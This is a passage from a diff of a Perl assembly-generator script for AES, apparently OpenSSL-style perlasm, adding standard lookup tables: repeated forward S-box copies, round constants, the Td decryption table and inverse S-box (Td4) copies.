+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+#rcon:
+$code.=<<___;
+	.long	0x00000001, 0x00000002, 0x00000004, 0x00000008
+	.long	0x00000010, 0x00000020, 0x00000040, 0x00000080
+	.long	0x0000001b, 0x00000036, 0x80808080, 0x80808080
+	.long	0xfefefefe, 0xfefefefe, 0x1b1b1b1b, 0x1b1b1b1b
+___
+$code.=<<___;
+.align	64
+.LAES_Td:
+___
+	&_data_word(0x50a7f451, 0x5365417e, 0xc3a4171a, 0x965e273a);
+	&_data_word(0xcb6bab3b, 0xf1459d1f, 0xab58faac, 0x9303e34b);
+	&_data_word(0x55fa3020, 0xf66d76ad, 0x9176cc88, 0x254c02f5);
+	&_data_word(0xfcd7e54f, 0xd7cb2ac5, 0x80443526, 0x8fa362b5);
+	&_data_word(0x495ab1de, 0x671bba25, 0x980eea45, 0xe1c0fe5d);
+	&_data_word(0x02752fc3, 0x12f04c81, 0xa397468d, 0xc6f9d36b);
+	&_data_word(0xe75f8f03, 0x959c9215, 0xeb7a6dbf, 0xda595295);
+	&_data_word(0x2d83bed4, 0xd3217458, 0x2969e049, 0x44c8c98e);
+	&_data_word(0x6a89c275, 0x78798ef4, 0x6b3e5899, 0xdd71b927);
+	&_data_word(0xb64fe1be, 0x17ad88f0, 0x66ac20c9, 0xb43ace7d);
+	&_data_word(0x184adf63, 0x82311ae5, 0x60335197, 0x457f5362);
+	&_data_word(0xe07764b1, 0x84ae6bbb, 0x1ca081fe, 0x942b08f9);
+	&_data_word(0x58684870, 0x19fd458f, 0x876cde94, 0xb7f87b52);
+	&_data_word(0x23d373ab, 0xe2024b72, 0x578f1fe3, 0x2aab5566);
+	&_data_word(0x0728ebb2, 0x03c2b52f, 0x9a7bc586, 0xa50837d3);
+	&_data_word(0xf2872830, 0xb2a5bf23, 0xba6a0302, 0x5c8216ed);
+	&_data_word(0x2b1ccf8a, 0x92b479a7, 0xf0f207f3, 0xa1e2694e);
+	&_data_word(0xcdf4da65, 0xd5be0506, 0x1f6234d1, 0x8afea6c4);
+	&_data_word(0x9d532e34, 0xa055f3a2, 0x32e18a05, 0x75ebf6a4);
+	&_data_word(0x39ec830b, 0xaaef6040, 0x069f715e, 0x51106ebd);
+	&_data_word(0xf98a213e, 0x3d06dd96, 0xae053edd, 0x46bde64d);
+	&_data_word(0xb58d5491, 0x055dc471, 0x6fd40604, 0xff155060);
+	&_data_word(0x24fb9819, 0x97e9bdd6, 0xcc434089, 0x779ed967);
+	&_data_word(0xbd42e8b0, 0x888b8907, 0x385b19e7, 0xdbeec879);
+	&_data_word(0x470a7ca1, 0xe90f427c, 0xc91e84f8, 0x00000000);
+	&_data_word(0x83868009, 0x48ed2b32, 0xac70111e, 0x4e725a6c);
+	&_data_word(0xfbff0efd, 0x5638850f, 0x1ed5ae3d, 0x27392d36);
+	&_data_word(0x64d90f0a, 0x21a65c68, 0xd1545b9b, 0x3a2e3624);
+	&_data_word(0xb1670a0c, 0x0fe75793, 0xd296eeb4, 0x9e919b1b);
+	&_data_word(0x4fc5c080, 0xa220dc61, 0x694b775a, 0x161a121c);
+	&_data_word(0x0aba93e2, 0xe52aa0c0, 0x43e0223c, 0x1d171b12);
+	&_data_word(0x0b0d090e, 0xadc78bf2, 0xb9a8b62d, 0xc8a91e14);
+	&_data_word(0x8519f157, 0x4c0775af, 0xbbdd99ee, 0xfd607fa3);
+	&_data_word(0x9f2601f7, 0xbcf5725c, 0xc53b6644, 0x347efb5b);
+	&_data_word(0x7629438b, 0xdcc623cb, 0x68fcedb6, 0x63f1e4b8);
+	&_data_word(0xcadc31d7, 0x10856342, 0x40229713, 0x2011c684);
+	&_data_word(0x7d244a85, 0xf83dbbd2, 0x1132f9ae, 0x6da129c7);
+	&_data_word(0x4b2f9e1d, 0xf330b2dc, 0xec52860d, 0xd0e3c177);
+	&_data_word(0x6c16b32b, 0x99b970a9, 0xfa489411, 0x2264e947);
+	&_data_word(0xc48cfca8, 0x1a3ff0a0, 0xd82c7d56, 0xef903322);
+	&_data_word(0xc74e4987, 0xc1d138d9, 0xfea2ca8c, 0x360bd498);
+	&_data_word(0xcf81f5a6, 0x28de7aa5, 0x268eb7da, 0xa4bfad3f);
+	&_data_word(0xe49d3a2c, 0x0d927850, 0x9bcc5f6a, 0x62467e54);
+	&_data_word(0xc2138df6, 0xe8b8d890, 0x5ef7392e, 0xf5afc382);
+	&_data_word(0xbe805d9f, 0x7c93d069, 0xa92dd56f, 0xb31225cf);
+	&_data_word(0x3b99acc8, 0xa77d1810, 0x6e639ce8, 0x7bbb3bdb);
+	&_data_word(0x097826cd, 0xf418596e, 0x01b79aec, 0xa89a4f83);
+	&_data_word(0x656e95e6, 0x7ee6ffaa, 0x08cfbc21, 0xe6e815ef);
+	&_data_word(0xd99be7ba, 0xce366f4a, 0xd4099fea, 0xd67cb029);
+	&_data_word(0xafb2a431, 0x31233f2a, 0x3094a5c6, 0xc066a235);
+	&_data_word(0x37bc4e74, 0xa6ca82fc, 0xb0d090e0, 0x15d8a733);
+	&_data_word(0x4a9804f1, 0xf7daec41, 0x0e50cd7f, 0x2ff69117);
+	&_data_word(0x8dd64d76, 0x4db0ef43, 0x544daacc, 0xdf0496e4);
+	&_data_word(0xe3b5d19e, 0x1b886a4c, 0xb81f2cc1, 0x7f516546);
+	&_data_word(0x04ea5e9d, 0x5d358c01, 0x737487fa, 0x2e410bfb);
+	&_data_word(0x5a1d67b3, 0x52d2db92, 0x335610e9, 0x1347d66d);
+	&_data_word(0x8c61d79a, 0x7a0ca137, 0x8e14f859, 0x893c13eb);
+	&_data_word(0xee27a9ce, 0x35c961b7, 0xede51ce1, 0x3cb1477a);
+	&_data_word(0x59dfd29c, 0x3f73f255, 0x79ce1418, 0xbf37c773);
+	&_data_word(0xeacdf753, 0x5baafd5f, 0x146f3ddf, 0x86db4478);
+	&_data_word(0x81f3afca, 0x3ec468b9, 0x2c342438, 0x5f40a3c2);
+	&_data_word(0x72c31d16, 0x0c25e2bc, 0x8b493c28, 0x41950dff);
+	&_data_word(0x7101a839, 0xdeb30c08, 0x9ce4b4d8, 0x90c15664);
+	&_data_word(0x6184cb7b, 0x70b632d5, 0x745c6c48, 0x4257b8d0);
+
+#Td4:	# four copies of Td4 to choose from to avoid L1 aliasing
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+$code.=<<___;
+	.long	0x80808080, 0x80808080, 0xfefefefe, 0xfefefefe
+	.long	0x1b1b1b1b, 0x1b1b1b1b, 0, 0
+___
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+$code.=<<___;
+	.long	0x80808080, 0x80808080, 0xfefefefe, 0xfefefefe
+	.long	0x1b1b1b1b, 0x1b1b1b1b, 0, 0
+___
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+$code.=<<___;
+	.long	0x80808080, 0x80808080, 0xfefefefe, 0xfefefefe
+	.long	0x1b1b1b1b, 0x1b1b1b1b, 0, 0
+___
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
